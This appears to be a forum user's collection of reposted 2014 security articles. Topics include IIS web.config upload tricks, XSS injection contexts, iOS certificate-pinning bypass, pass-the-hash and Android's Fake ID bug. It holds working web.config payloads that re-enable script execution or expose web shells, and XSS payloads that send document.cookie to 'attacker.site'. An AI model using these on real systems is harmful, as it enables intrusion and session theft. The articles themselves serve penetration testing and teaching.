Everything posted by Nytro

1. [h=1]Upload a web.config File for Fun & Profit[/h] The web.config file plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in the Apache web server. Uploading a .htaccess file to bypass protections around uploaded files is a well-known technique; some interesting examples of it are accessible via the following GitHub repository: https://github.com/wireghoul/htshells In IIS7 (and higher), it is possible to do similar tricks by uploading or creating a web.config file, and a few of these tricks may even be applicable to IIS6 with some minor changes. The techniques below show different web.config files that can be used to bypass protections around file uploaders.

[h=2]Running web.config as an ASP file[/h] Sometimes IIS supports ASP files, but it is not possible to upload any file with an .ASP extension. In this case, a web.config file can be used directly to run classic ASP code:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include an HTML comment closing tag or double dashes!
<% Response.write("-"&"->") ' the ASP code is running if you see 3 when opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-") %>
-->

[h=2]Removing protections of hidden segments[/h] Sometimes file uploaders rely on the Hidden Segments feature of IIS Request Filtering, using directories such as App_Data or App_GlobalResources to make the uploaded files inaccessible directly. However, this method can be bypassed by removing the hidden segments with the following web.config file:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <hiddenSegments>
          <remove segment="bin" />
          <remove segment="App_code" />
          <remove segment="App_GlobalResources" />
          <remove segment="App_LocalResources" />
          <remove segment="App_Browsers" />
          <remove segment="App_WebReferences" />
          <remove segment="App_Data" />
          <!-- Other IIS hidden segments can be listed here -->
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>

Now an uploaded web shell file is directly accessible.

[h=2]Creating an XSS vulnerability in the IIS default error page[/h] Often attackers want to make a website vulnerable to cross-site scripting by abusing the file upload feature.
The handler name of the IIS default error page is vulnerable to cross-site scripting, which can be exploited by uploading a web.config file that contains an invalid handler name (this does not work in IIS 6 or below):

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers>
      <!-- XSS by using *.config -->
      <add name="web_config_xss<script>alert('xss1')</script>" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="fooo" resourceType="Unspecified" requireAccess="None" preCondition="bitness64" />
      <!-- XSS by using *.test -->
      <add name="test_xss<script>alert('xss2')</script>" path="*.test" verb="*" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
    <httpErrors existingResponse="Replace" errorMode="Detailed" />
  </system.webServer>
</configuration>

[h=2]Other techniques[/h] Rewriting or creating the web.config file can lead to a major security flaw. In addition to the above scenarios, different web.config files can be used in different situations. I have listed some other examples below (the relevant web.config syntax can easily be found by searching on Google):
- Re-enabling .NET extensions: when .NET extensions such as .ASPX are blocked in the upload folder (a hedged configuration sketch for this case follows at the end of this post).
- Using an allowed extension to run as another extension: when ASP, PHP, or other extensions are installed on the server but are not allowed in the upload directory.
- Abusing error pages or URL rewrite rules to redirect users or deface the website: when uploaded files such as PDF or JavaScript files are used directly by the users.
- Manipulating MIME types of uploaded files: when it is not possible to upload an HTML file (or other sensitive client-side files), or when the IIS MIME types table is restricted to certain extensions.

[h=2]Targeting more users via client-side attacks[/h] Files that have already been uploaded to the website and are used in different places can be replaced with other contents by using the web.config file. As a result, an attacker can potentially target more users and exploit client-side issues such as XSS or cross-site data hijacking by replacing or redirecting the existing uploaded files.

[h=2]Additional Tricks[/h] Sometimes it is not possible to upload or create a web.config file directly. In this case, the copy, move, or rename functionality of the web application can be abused to create a web.config file. The Alternate Data Stream feature can also be useful for this purpose. For example, "web.config::$DATA" can create a web.config file with the uploaded file's contents, or "web.config:.txt" can be used to create an empty web.config file; and when a web.config file is available in the upload folder, the Windows 8.3 filename ("WEB~1.con") or the PHP-on-IIS feature ("web<<") can be used to point at the web.config file.

Sursa: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
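To make the first item in the "Other techniques" list concrete, here is a minimal, hedged sketch of a web.config that could re-enable .NET execution inside an upload folder where the .ASPX handler has been removed. The PageHandlerFactory mapping shown is the standard integrated-mode handler, but the exact attributes depend on the .NET version installed on the server, so treat this as illustrative rather than the article's own payload:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers>
      <!-- Illustrative: map *.aspx in this folder back to the .NET page handler -->
      <add name="aspx_upload" path="*.aspx" verb="*" type="System.Web.UI.PageHandlerFactory" resourceType="Unspecified" preCondition="integratedMode" />
    </handlers>
  </system.webServer>
</configuration>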
2. Bypass iOS Version Check and Certification validation 7/28/2014 | NetsPWN Certain iOS applications check the iOS version number of the device. Recently, during testing, I encountered an iOS application that was checking for iOS version 7.1. If version 7.1 was not being used, the application would not install on the device and would throw an error. This blog is divided into three parts:
1. Change the version number value in the SystemVersion.plist file.
2. Change the version number value in the plist file present in the iOS application IPA.
3. Use the 'iOS SSL Kill Switch' tool to bypass certificate validation.

Change version number value in SystemVersion.plist file
The version of the iOS device can be faked (on a jailbroken device) in two simple steps by changing the value in the SystemVersion.plist file:
1. SSH into a jailbroken device (or use iFile, available on Cydia) to browse through the system folder.
2. Change the 'ProductVersion' value in the '/System/Library/CoreServices/SystemVersion.plist' file to the desired iOS version.
Fig 1: iOS version can be faked by changing the value of the ProductVersion key.
This will change the version number displayed in the version tab located in 'Settings/General/About' on the iOS device. Although this trick might work on some of the applications that check for the value saved in the '/System/Library/CoreServices/SystemVersion.plist' file, it won't work on every application. If it fails, we can use the second method given below.

Change version number value in plist file present in iOS application IPA
If you are unsure about the method the application is using to look for the version number, we can use another simple trick to change the iOS version value. The version check in an IPA can be faked in three simple steps:
1. Rename the IPA to a .zip file and extract the folder.
2. Find the Info.plist file, usually located in \Payload\appname.app, and change the 'MinimumOSVersion' string to the version you need.
3. Zip the file again and change the extension back to .ipa.
[Note: Some applications may use other plist files instead of the Info.plist file to check for the minimum version]
Fig 2: MinimumOSVersion requirement defined in the Info.plist file in the iOS application.
Manipulating any file inside the IPA will break the signature, so to fix this problem the IPA needs to be re-signed. We can use the tool given on Christoph Ketzler's blog. (A minimal command-line sketch of these repacking steps appears at the end of this post.)
Some applications also perform the version check during the installation process. When a user tries to install the application using iTunes or Xcode, the installer checks the version of iOS running on the device, and if the version is lower than the minimum required version it will throw an error similar to the one given below.
Fig 3: Error message while installing the application using Xcode.
The version check performed during the installation stage can be bypassed using this simple trick:
1. Rename the .ipa application package to .zip and then extract the .app folder.
2. Copy the .app folder to the path where iOS applications are installed (/root/application) using an SFTP client like WinSCP.
3. SSH into the device and browse to the folder where the IPA is installed, then change the permissions of the .app folder to executable (chmod -R 755 or chmod -R 777). Alternatively, you can change the permissions by right-clicking the .app in WinSCP, choosing properties, and checking all the read, write, and execute permissions.
4. Restart the iOS device and the application will be successfully installed.
Fig 4: Changing permissions of the IPA to executable.

iOS certificate validation bypass
Some applications perform certificate validation, which prevents application traffic from being proxied using a MitM proxy like Burp. Typically the application has a client certificate hard-coded into the binary (i.e. the application itself). The server checks for this client certificate, and if it does not match it throws a certificate validation error. Refer to my co-worker Steve Kern's blog on Certificate Pinning in a Mobile Application for further details. Sometimes it is difficult to extract the certificate from the application and install it into the proxy. An alternative approach is to use a tool developed by iSEC Partners called ios-ssl-kill-switch. This tool hooks into the Secure Transport API, which is the lowest-level API, and disables the check for certificate validation. Most certificate validation techniques use NSURLConnection, a higher-level API, to validate client certificates. More technical details can be found here. Bypassing certificate validation can be performed in the following steps:
1. Install the ios-ssl-kill-switch tool. Make sure the dependencies given on the installation page are installed prior to installing the software.
2. Restart the device, or restart SpringBoard using the following command: 'killall -HUP SpringBoard'
3. Enable the Disable Certificate Validation option in 'Settings/SSL Kill Switch'.
4. Restart the application and confirm that a MitM proxy can intercept the traffic successfully.
Certificate pinning can be bypassed by hooking into the API which performs the certificate validation check and returning a true value for 'certificate validated' all the time. MobileSubstrate is a useful framework for writing tweaks that disable certificate pinning checks. There are a few other handy tools as well, like 'Trustme' by Intrepidusgroup and 'Snoop-it' by Nesolabs, to disable certificate pinning.
Fig 5: Turn off certificate validation using SSL Kill Switch.
Sursa: https://www.netspi.com/blog/entryid/236/bypass-ios-version-check-and-certification-validation
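As promised above, a minimal command-line sketch of the IPA repacking steps from the second section. The app name MyApp is hypothetical, and plutil is the plist editor shipped with OS X; any plist editor will do the same job:

# An IPA is just a zip archive: rename and unpack it
cp MyApp.ipa MyApp.zip
unzip MyApp.zip -d MyApp_unpacked

# Lower the minimum OS version the installer checks for (key per Fig 2)
plutil -replace MinimumOSVersion -string "6.0" MyApp_unpacked/Payload/MyApp.app/Info.plist

# Repack; remember the IPA must be re-signed before it will install
cd MyApp_unpacked && zip -r ../MyApp-patched.ipa Payload && cd ..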
3. Using SSL Certificates with HAProxy Posted 2014/07/29 I'm writing an eBook, Servers for Hackers! Check out the page for more information - it should be out in early September.

Overview
If your application makes use of SSL certificates, then some decisions need to be made about how to use them with a load balancer. A simple setup of one server usually sees a client's SSL connection being decrypted by the server receiving the request. Because a load balancer sits between a client and one or more servers, where the SSL connection is decrypted becomes a concern. There are two main strategies.

SSL Termination is the practice of terminating/decrypting an SSL connection at the load balancer and sending unencrypted connections to the backend servers. This means the load balancer is responsible for decrypting an SSL connection - a slow and CPU-intensive process relative to accepting non-SSL requests. (A configuration sketch of this setup appears at the end of this post.)

This is the opposite of SSL Pass-Through, which sends SSL connections directly to the proxied servers. With SSL Pass-Through, the SSL connection is terminated at each proxied server, distributing the CPU load across those servers. However, you lose the ability to add or edit HTTP headers, as the connection is simply routed through the load balancer to the proxied servers. This means your application servers will lose the ability to get the X-Forwarded-* headers, which may include the client's IP address, port and scheme used.

Which strategy you choose is up to you and your application's needs. SSL Termination is the most typical I've seen, but pass-through is likely more secure. There is a combination of the two strategies, where SSL connections are terminated at the load balancer, adjusted as needed, and then proxied off to the backend servers as a new SSL connection. This may provide the best of both security and the ability to send the client's information. The trade-off is more CPU power being used all around, and a little more complexity in configuration.

An older article of mine on the consequences and gotchas of using load balancers explains these issues (and more) as well. Articol: Using SSL Certificates with HAProxy | Servers for Hackers
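As a minimal sketch of the termination strategy, assuming HAProxy 1.5+ and illustrative paths and addresses (the PEM file must contain the certificate and private key concatenated):

frontend www-https
    # SSL is terminated here; backends receive plain HTTP
    bind *:443 ssl crt /etc/ssl/private/example.com.pem
    # Preserve the client's original scheme for the application servers
    reqadd X-Forwarded-Proto:\ https
    default_backend app-servers

backend app-servers
    server app1 10.0.0.11:80 check
    server app2 10.0.0.12:80 check

For SSL pass-through, the frontend and backend would instead run in 'mode tcp', so HAProxy forwards the still-encrypted stream and never gets the chance to read or modify the HTTP headers.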
4. Contexts and Cross-site Scripting - a brief intro Yesterday Anant posted a question in the IronWASP Facebook group asking about the different potential contexts related to XSS, to better understand how context-specific filtering is done. It would be hard to post the response in a comment, so I am turning it into a blog post instead. If you are the kind of person who likes reading code instead of text, then download the source code of IronWASP and check out the CrossSiteScriptingCheck.cs file in the ActivePlugins directory; this post is based on the logic IronWASP uses for its XSS check.

If user-controlled input appears in some part of a web page and this behaviour leads to the security of the site being compromised in some way, then the page is said to be affected by Cross-site Scripting. A web page is nothing but text; the browser, however, does not look at it as a single monolithic blob of text. Instead, different sections of the page can be interpreted differently by the browser as HTML, CSS or JavaScript. Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page can have depends on the context in which the browser tries to interpret that input. I will try to list out the different contexts in which user input can occur in a web page.

1) Simple HTML Context
In the body of an existing HTML tag, or at the start and end of the page outside of the <html> tag.
<some_html_tag> user_input </some_html_tag>
In this context you can enter any kind of valid HTML as the user input and it will immediately be rendered by the browser; it is an executable context.
Eg: <img src=x onerror=alert(1)>

2) HTML Attribute Name Context
Inside the opening HTML tag, after the tag name or after an attribute value.
<some_html_tag user_input some_attribute_name="some_attribute_value"/>
In this context you can enter an event handler name followed by JavaScript code after an = symbol and get code execution; it can be considered an executable context.
Eg: onclick="alert(1)"

3) HTML Attribute Value Context
Inside the opening HTML tag, after an attribute name separated by an = symbol.
<some_html_tag some_attribute_name="user_input" />
<some_html_tag some_attribute_name='user_input' />
<some_html_tag some_attribute_name=user_input />
There are three variations of this context:
- Double-quoted attribute
- Single-quoted attribute
- Quote-less attribute
Code execution in this context depends on the type of attribute in which the input appears. There are different types of attributes:
a) Event attributes
These are attributes like onclick, onload, etc., whose values are executed as JavaScript. So anything here is the same as the JavaScript context.
b) URL attributes
These are attributes that take a URL as a value, for example the src attribute of different tags. Entering a JavaScript URL here can lead to JavaScript execution.
Eg: javascript:some_javascript()
c) Special URL attributes
These are URL attributes where entering even a regular URL can lead to security issues. Some examples are:
<script src="user_input"
<iframe src="user_input"
<frame src="user_input"
<link href="user_input"
<object data="user_input"
<embed src="user_input"
<form action="user_input"
<button formaction="user_input"
<base href="user_input"
<a href="user_input"
Entering just an absolute http or https URL in these cases could affect the security of the website.
In some cases, if it is possible to upload user-controlled data onto the server, then even entering relative URLs here can lead to a problem. Some sites might strip off http:// and https:// from the values entered in these attributes to prevent absolute URLs from being entered, but there are many ways in which an absolute URL can be specified.
d) META tag attributes
Meta tag attributes like charset can influence how the contents of the page are interpreted by the browser. And then there is the http-equiv attribute, which can emulate the behaviour of HTTP response headers. Influencing the values of headers like Content-Type, Set-Cookie, etc. will have an impact on the security of the page.
e) Normal attributes
If the input appears in a normal attribute value, then this context must be escaped to lead to code execution. If the attribute is quoted, then the corresponding quote must be used to escape the context; in the case of unquoted attributes, a space or backslash should do the job. Once out of this context, a new event handler can be added to achieve code execution.
Eg:
" onclick=alert(1)
' onclick=alert(1)
 onclick=alert(1)

4) HTML Comments Context
Inside the comments section of HTML.
<!-- some_comment user_input some_comment -->
This is a non-executable context and it is necessary to break out of this context to execute code. Entering --> terminates this context and switches any subsequent text to the HTML context.
Eg: --><img src=x onerror=alert(1)>

5) JavaScript Context
Inside the JavaScript code portions of the page.
<script> some_javascript user_input some_javascript </script>
This applies to the sections enclosed by SCRIPT tags, to event handler attribute values, and to URLs prefixed with javascript:. Inside JavaScript, user input can appear in the following contexts:
a) Code context
b) Single-quoted string context
c) Double-quoted string context
d) Single-line comment context
e) Multi-line comment context
f) Strings being assigned to Executable Sinks
If user input is between SCRIPT tags then, no matter which of the above contexts it appears in, you can switch to the HTML context simply by including a closing SCRIPT tag and then inserting any HTML.
Eg: </script><img src=x onerror=alert(1)>
If you are not going to switch to the HTML context, then you have to tailor the input to the specific JavaScript context it appears in.
a) Code context
function dev_func(input) {some_js_code}
dev_func(user_input);
some_variable=123;
This is an executable context; user input appears directly as an expression, so you can enter JavaScript statements and they will be executed.
Eg: $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//
b) Single-quoted string context
var some_variable='user_input';
This is a non-executable context and the user input must include a single quote at the beginning to switch out of the string context and enter the code context.
Eg: '; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//
c) Double-quoted string context
var some_variable="user_input";
This is a non-executable context and the user input must include a double quote at the beginning to switch out of the string context and enter the code context.
Eg: "; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//
d) Single-line comment context
some_js_func();//user_input
This is a non-executable context and the user input must include a new line character to terminate the single-line comment context and switch to the code context.
Eg: \r\n$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//
e) Multi-line comment context
some_js_func(); /* user_input */ some_js_code
This is a non-executable context and the user input must include */ to terminate the multi-line comment context and switch to the code context.
Eg: */$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//
f) Strings being assigned to Executable Sinks
These are single-quoted or double-quoted string contexts, but the twist is that these strings are passed to a function or assigned to a property that treats the string as executable code. Some examples are:
eval("user_input");
location = "user_input";
setTimeout("user_input", 1000);
x.innerHTML = "user_input";
For more sinks refer to the DOM XSS wiki. This should be treated similarly to the Code context.

6) VBScript Context
This is very rare these days, but there might still be that odd site that uses VBScript.
<script language="vbscript" type="text/vbscript"> some_vbscript user_input some_vbscript </script>
Like JavaScript, you can switch out to the HTML context with the </script> tag. Inside VBScript, user input can appear in the following contexts:
a) Code context
b) Single-line comment context
c) Double-quoted string context
d) Strings being assigned to Executable Sinks
a) Code context
Similar to its JavaScript equivalent; you can directly enter VBScript.
b) Single-line comment context
VBScript only has single-line comments, and similar to its JavaScript equivalent, entering a new line character will terminate the comment context and switch to the code context.
c) Double-quoted string context
Similar to its JavaScript equivalent.
d) Strings being assigned to Executable Sinks
Similar to its JavaScript equivalent.

7) CSS Context
Inside the CSS code portions of the page.
<style> some_css user_input some_css </style>
This applies to the sections enclosed by STYLE tags and to style attribute values. Injecting CSS into a page can itself have some kind of impact on the page. For example, by changing the location, visibility, size and z-index of the elements in a page, it might be possible to make the user perform an action different from what they think they are doing. But the more interesting aspect is how JavaScript can be executed from within CSS. Though not possible in modern browsers, older browsers did support JavaScript execution in two ways:
i. The expression property
expression is an Internet Explorer-only feature that allows execution of JavaScript embedded inside CSS.
css_selector { property_name: expression(some_javascript); }
ii. JavaScript URLs
Some CSS properties, like the background-image property, take a URL as their value. In older browsers, entering a JavaScript URL here would result in JavaScript code being executed.
css_selector { background-image: javascript:some_javascript() }
Inside CSS, user input can appear in the following contexts:
a) Statement context
b) Single-quoted/Double-quoted string context
c) Multi-line comment context
d) Strings being assigned to Executable Sinks
Similar to the SCRIPT tag, if user input is between STYLE tags, then you can switch to the HTML context simply by including a closing STYLE tag and then inserting any HTML.
Eg: </style><img src=x onerror=alert(1)>
If you are not going to switch to the HTML context, then you have to tailor the input to the specific CSS context it appears in.
a) Statement context
In this context you can directly start including CSS to modify the page for a social engineering attack, or make use of the expression property or the JavaScript URL method to inject JavaScript code.
b) Single-quoted/Double-quoted string context
Including a single or double quote at the start of the input terminates the string context and switches to the statement context.
c) Multi-line comment context
Similar to the JavaScript multi-line comment: entering */ terminates the comment context and switches to the statement context.
d) Strings being assigned to Executable Sinks
This is a single-quoted or double-quoted string that is either passed to the expression property or assigned to a property that takes a URL, like background-image. In both cases the data inside the string context can be interpreted as JavaScript code by the browser.
Though I have mentioned the standard ways to escape out of the different contexts, these are by no means the only ways. There are plenty of browser quirks that allow escaping out of contexts in strange ways. To find out about them I would recommend you get the Web Application Obfuscation book and also refer to the HTML5 Security Cheatsheet and the fuzz results of Shazzer. There is a good chance you might already know about OWASP's XSS Prevention CheatSheet; you might also find this other XSS Protection Cheat Sheet to be useful. A tiny demo page illustrating three of these contexts follows below. Posted by IronWASP at 5:56 AM Sursa: IronWASP - Open Source Advanced Web Security Testing Platform: Contexts and Cross-site Scripting - a brief intro
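As promised above, a tiny hypothetical page showing how the same user_input reflection point lands in three different contexts, and why a payload must be tailored to each:

<!-- Hypothetical page reflecting the same input in three contexts -->
<div>user_input</div>                           <!-- 1) simple HTML context -->
<input type="text" value="user_input">          <!-- 3) double-quoted attribute value -->
<script>var q = 'user_input';</script>          <!-- 5.b) single-quoted JS string -->
<!--
  <img src=x onerror=alert(1)>   executes only in the first context,
  " onmouseover=alert(1) x="     escapes only the second,
  ';alert(1)//                   escapes only the third.
-->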
5. [h=1]HIP14 - C++11 metaprogramming techniques applied to software obfuscation[/h] Published on Jul 29, 2014 By Sebastien Andrivet Hack in Paris: the leading IT security technical event in France, organized by Sysdream
6. [h=1]HIP14 - Defeating UEFI/WIN8 SecureBoot[/h] Published on Jul 29, 2014 By John Butterworth Hack in Paris: the leading IT security technical event in France, organized by Sysdream
7. [h=1]HIP14 - Pentesting NoSQL exploitation framework[/h] Published on Jul 29, 2014 By Francis Alexander Hack in Paris: the leading IT security technical event in France, organized by Sysdream
8. [h=1]HIP14 - Fuzzing, reversing and maths[/h] Published on Jul 29, 2014 By Josep Pi Rodriguez & Pedro Guillen Nunez Hack in Paris: the leading IT security technical event in France, organized by Sysdream
9. [h=1]HIP14 - ARM AARCH64: writing exploits for the new ARM architecture[/h] Published on Jul 29, 2014 By Thomas Roth Hack in Paris: the leading IT security technical event in France, organized by Sysdream
10. [h=3]Defensible Network Architecture 2.0[/h] Four years ago when I wrote The Tao of Network Security Monitoring I introduced the term defensible network architecture. I expanded on the concept in my second book, Extrusion Detection. When I first presented the idea, I said that a defensible network is an information architecture that is monitored, controlled, minimized, and current. In my opinion, a defensible network architecture gives you the best chance to resist intrusion, since perfect intrusion prevention is impossible. I'd like to expand on that idea with Defensible Network Architecture 2.0. I believe these themes would be suitable for a strategic, multi-year program at any organization that commits itself to better security. You may notice the contrast with the Self-Defeating Network and the similarities to my Security Operations Fundamentals. I roughly order the elements from least likely to most likely to encounter resistance from stakeholders. A Defensible Network Architecture is an information architecture that is:

Monitored. The easiest and cheapest way to begin developing DNA on an existing enterprise is to deploy Network Security Monitoring sensors capturing session data (at an absolute minimum), full content data (if you can get it), and statistical data. If you can access other data sources, like firewall/router/IPS/DNS/proxy/whatever logs, begin working that angle too. Save the tougher data types (those that require reconfiguring assets and buying mammoth databases) until much later. This needs to be a quick win with the data in the hands of a small, centralized group. You should always start by monitoring first, as Bruce Schneier proclaimed so well in 2001.

Inventoried. This means knowing what you host on your network. If you've started monitoring you can acquire a lot of this information passively. This is new to DNA 2.0 because I assumed it would already have been done. Fat chance!

Controlled. Now that you know how your network is operating and what is on it, you can start implementing network-based controls. Take this any way you wish -- ingress filtering, egress filtering, network admission control, network access control, proxy connections, and so on. The idea is you transition from an "anything goes" network to one where the activity is authorized in advance, if possible. This step marks the first time where stakeholders might start complaining.

Claimed. Now you are really going to reach out and touch a stakeholder. Claimed means identifying asset owners and developing policies, procedures, and plans for the operation of that asset. Feel free to swap this item with the previous. In my experience it is usually easier to start introducing control before making people take ownership of systems. This step is a prerequisite for performing incident response. We can detect intrusions in the first step. We can only work with an asset owner to respond when we know who owns the asset and how we can contain and recover it.

Minimized. This step is the first to directly impact the configuration and posture of assets. Here we work with stakeholders to reduce the attack surface of their network devices. You can apply this idea to clients, servers, applications, network links, and so on. By reducing attack surface area you improve your ability to perform all of the other steps, but you can't really implement minimization until you know who owns what.

Assessed.
This is a vulnerability assessment process to identify weaknesses in assets. You could easily place this step before minimization. Some might argue that it pays to begin with an assessment, but the first question is going to be: "What do we assess?" I think it might be easier to start disabling unnecessary services first, but you may not know what's running on the machines without assessing them. Also consider performing an adversary simulation to test your overall security operations. Assessment is the step where you decide if what you've done so far is making any difference.

Current. Current means keeping your assets configured and patched such that they can resist known attacks by addressing known vulnerabilities. It's easy to disable functionality no one needs. However, upgrades can sometimes break applications. That's why this step is last. It's the final piece in DNA 2.0.

So, there's DNA 2.0 -- MICCMAC (pronounced "mick-mack"). You may notice the Federal government is adopting parts of this approach, as mentioned in my post Feds Plan to Reduce, then Monitor. I prefer to at least get some monitoring going first, since even incomplete instrumentation tells you what is happening. Minimization based on opinion instead of fact is likely to be ugly. Did I miss anything? Posted by Richard Bejtlich at 22:22 Sursa: TaoSecurity: Defensible Network Architecture 2.0
11. Android crypto blunder exposes users to highly privileged malware "Fake ID" exploits work because Android doesn't properly inspect certificates. by Dan Goodin - July 29, 2014

(Slide from next week's Black Hat talk on the Android Fake ID vulnerability. Image: Bluebox Security.)

The majority of devices running Google's Android operating system are susceptible to hacks that allow malicious apps to bypass a key security sandbox so they can steal user credentials, read e-mail, and access payment histories and other sensitive data, researchers have warned. The high-impact vulnerability has existed in Android since the release of version 2.1 in early 2010, researchers from Bluebox Security said. They dubbed the bug Fake ID because, like a fraudulent driver's license an underage person might use to sneak into a bar, it grants malicious apps special access to Android resources that are typically off-limits. Google developers have introduced changes that limit some of the damage that malicious apps can do in Android 4.4, but the underlying bug remains unpatched, even in the Android L preview.

The Fake ID vulnerability stems from the failure of Android to verify the validity of cryptographic certificates that accompany each app installed on a device. The OS relies on the credentials when allocating special privileges that allow a handful of apps to bypass Android sandboxing. Under normal conditions, the sandbox prevents programs from accessing data belonging to other apps or to sensitive parts of the OS. Select apps, however, are permitted to break out of the sandbox. Adobe Flash in all but version 4.4, for instance, is permitted to act as a plugin for any other app installed on the phone, presumably to allow it to add animation and graphics support. Similarly, Google Wallet is permitted to access Near Field Communication hardware that processes payment information.

According to Jeff Forristal, CTO of Bluebox Security, Android fails to verify the chain of certificates used to certify that an app belongs to this elite class of super-privileged programs. As a result, a maliciously developed app can include an invalid certificate claiming it's Flash, Wallet, or any other app hard-coded into Android. The OS, in turn, will give the rogue app the same special privileges assigned to the legitimate app without ever taking the time to detect the certificate forgery. "All it really takes is for an end user to choose to install this fake app, and it's pretty much game over," Forristal told Ars. "The Trojan horse payload will immediately escape the sandbox and start doing whatever evil things it feels like, for instance, stealing personal data."

Other apps that receive special Android privileges include device management extensions from a company known as 3LM. Organizations use such apps to add security enhancements and other special features to large fleets of phones. An app that masqueraded as one of these programs could gain almost unfettered administrative rights on phones that were configured to work with the manager. Forristal hasn't ruled out the existence of other apps that are automatically assigned heightened privileges by Android. Changes introduced in Android 4.4 limit some of the privileges Android grants to Flash. Still, Forristal said the failure to verify the certificate chain is present in all Android devices since 2.1. That means malicious apps can bypass sandbox restrictions by impersonating Google Wallet, 3LM managers, and any other apps Android is hardcoded to favor.
A spokesman for Google issued the following statement: We appreciate Bluebox responsibly reporting this vulnerability to us; third-party research is one of the ways Android is made stronger for users. After receiving word of this vulnerability, we quickly issued a patch that was distributed to Android partners, as well as to AOSP. Google Play and Verify Apps have also been enhanced to protect users from this issue. At this time, we have scanned all applications submitted to Google Play as well as those Google has reviewed from outside of Google Play, and we have seen no evidence of attempted exploitation of this vulnerability.

The statement didn't say exactly what Google did to patch the vulnerability or specify whether any Android partners have yet to distribute it to end users. This article will be updated if company representatives elaborate beyond the four sentences above. As Ars has documented previously, it's not unusual for attackers to sneak malicious apps into the official Google Play marketplace. If it's possible for approved apps to contain cryptocurrency miners, remote access trojans, or other hidden functions, there's no obvious reason they can't include cryptographic credentials fraudulently certifying they were spawned by 3LM, Google, Microsoft, or any other developer granted special privileges. "With this vulnerability, malware has a way to abuse any one of these hardcoded identities that Android implicitly trusts," said Forristal, who plans to divulge additional details at next week's Black Hat security conference. "So malware can use the fake Adobe ID and become a plugin to other apps. Malware can also use the 3LM to control the entire device." Sursa: Android crypto blunder exposes users to highly privileged malware | Ars Technica
12. Binwalk v2.0.0, released by devttys0. Highlights:
- Python3 support
- Raw deflate detection/extraction
- Improved API
- Improved speed
- More (and improved) signatures
- Faster entropy scans
- Much more...
Lots of thanks to everyone who submitted patches and bug reports! Sursa: https://github.com/devttys0/binwalk/releases/tag/v2.0.0
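For context, a few typical binwalk invocations against a firmware image (the filename is illustrative; flags per the 2.x command line):

# Scan a firmware image for embedded file signatures
binwalk firmware.bin

# Recursively extract everything binwalk can carve out (raw deflate streams included in 2.0)
binwalk -Me firmware.bin

# Plot entropy to spot compressed or encrypted regions
binwalk -E firmware.bin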
13. Pass-the-Hash is Dead: Long Live Pass-the-Hash July 29, 2014 by harmj0y You may have heard the word recently about how a recent Microsoft patch has put all of us pentesters out of a job. Pass-the-hash is dead, attackers can no longer spread laterally, and Microsoft has finally secured its authentication mechanisms. Oh wait: This is a fully-patched Windows 7 system in a fully-patched Windows 2012 domain. So what's going on here? What has Microsoft claimed to do, what have they actually done, and what are the implications of all of this? The security advisory and associated knowledge base article we're dealing with here is KB2871997 (aka the Mimikatz KB). Besides backporting some of the Windows 8.1 protections that make extracting plaintext credentials from LSASS slightly more difficult, the advisory includes this ominous (to pentesters, at least) statement: "Changes to this feature include: prevent network logon and remote interactive logon to domain-joined machine using local accounts…". On the surface, this looks like it totally quashes the Windows pivoting vectors we've been taking advantage of for so long [insert doom and gloom here]. Microsoft even originally titled the advisory "Update to fix the Pass-The-Hash Vulnerability", but quickly changed it to "Update to improve credentials protection and management": http://www.infosecisland.com/blogview/23787-Windows-Update-to-Fix-Pass-the-Hash-Vulnerability-Not.html It's true, Microsoft has definitely raised the bar: accounts that are members of the local "Administrators" group are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. Oh, except (as pwnag3 reports and our experiences confirm) the RID 500 built-in Administrator account, even if it's renamed. While Windows 7 installs will now disable this account by default and prompt for a user to set up another local administrator, many organizations accustomed to standard advice and compliance still have loads of RID 500 accounts, enabled, all over their enterprise. Some organizations rely on this account for backwards-compatibility reasons, and some use it as a way to perform vulnerability scans without passing around Domain Admin credentials. If a domain is built using only modern Windows OSs and COTS products (which know how to operate within these new constraints), and configured correctly with no shortcuts taken, then these protections represent a big step forward. Microsoft has finally started to wise up to some of its inherent security issues, which I seriously applaud them for. However, the vast majority of organizations are a Frankensteinian amalgamation of security/management products, old (and sometimes unpatched) servers, heterogeneous clients, lazy admins, backwards-compatibility-focused engineers, and usability-focused business units. Regardless, accounts with this security identifier are almost certainly going to be enabled and around for a while. Additionally, Windows 2003 isn't affected (and it will surely linger around organizations significantly longer than Windows XP), and domain accounts which maintain administrative access over a machine can still have their hashes passed to your heart's content. Also, these local admin accounts should still work with PSRemoting if it's enabled. Some organizations will leave the WinRM service running as an artifact of deployment, and while you can't use hashes for auth in this case, plaintext credentials can be specified for a remote PowerShell session.
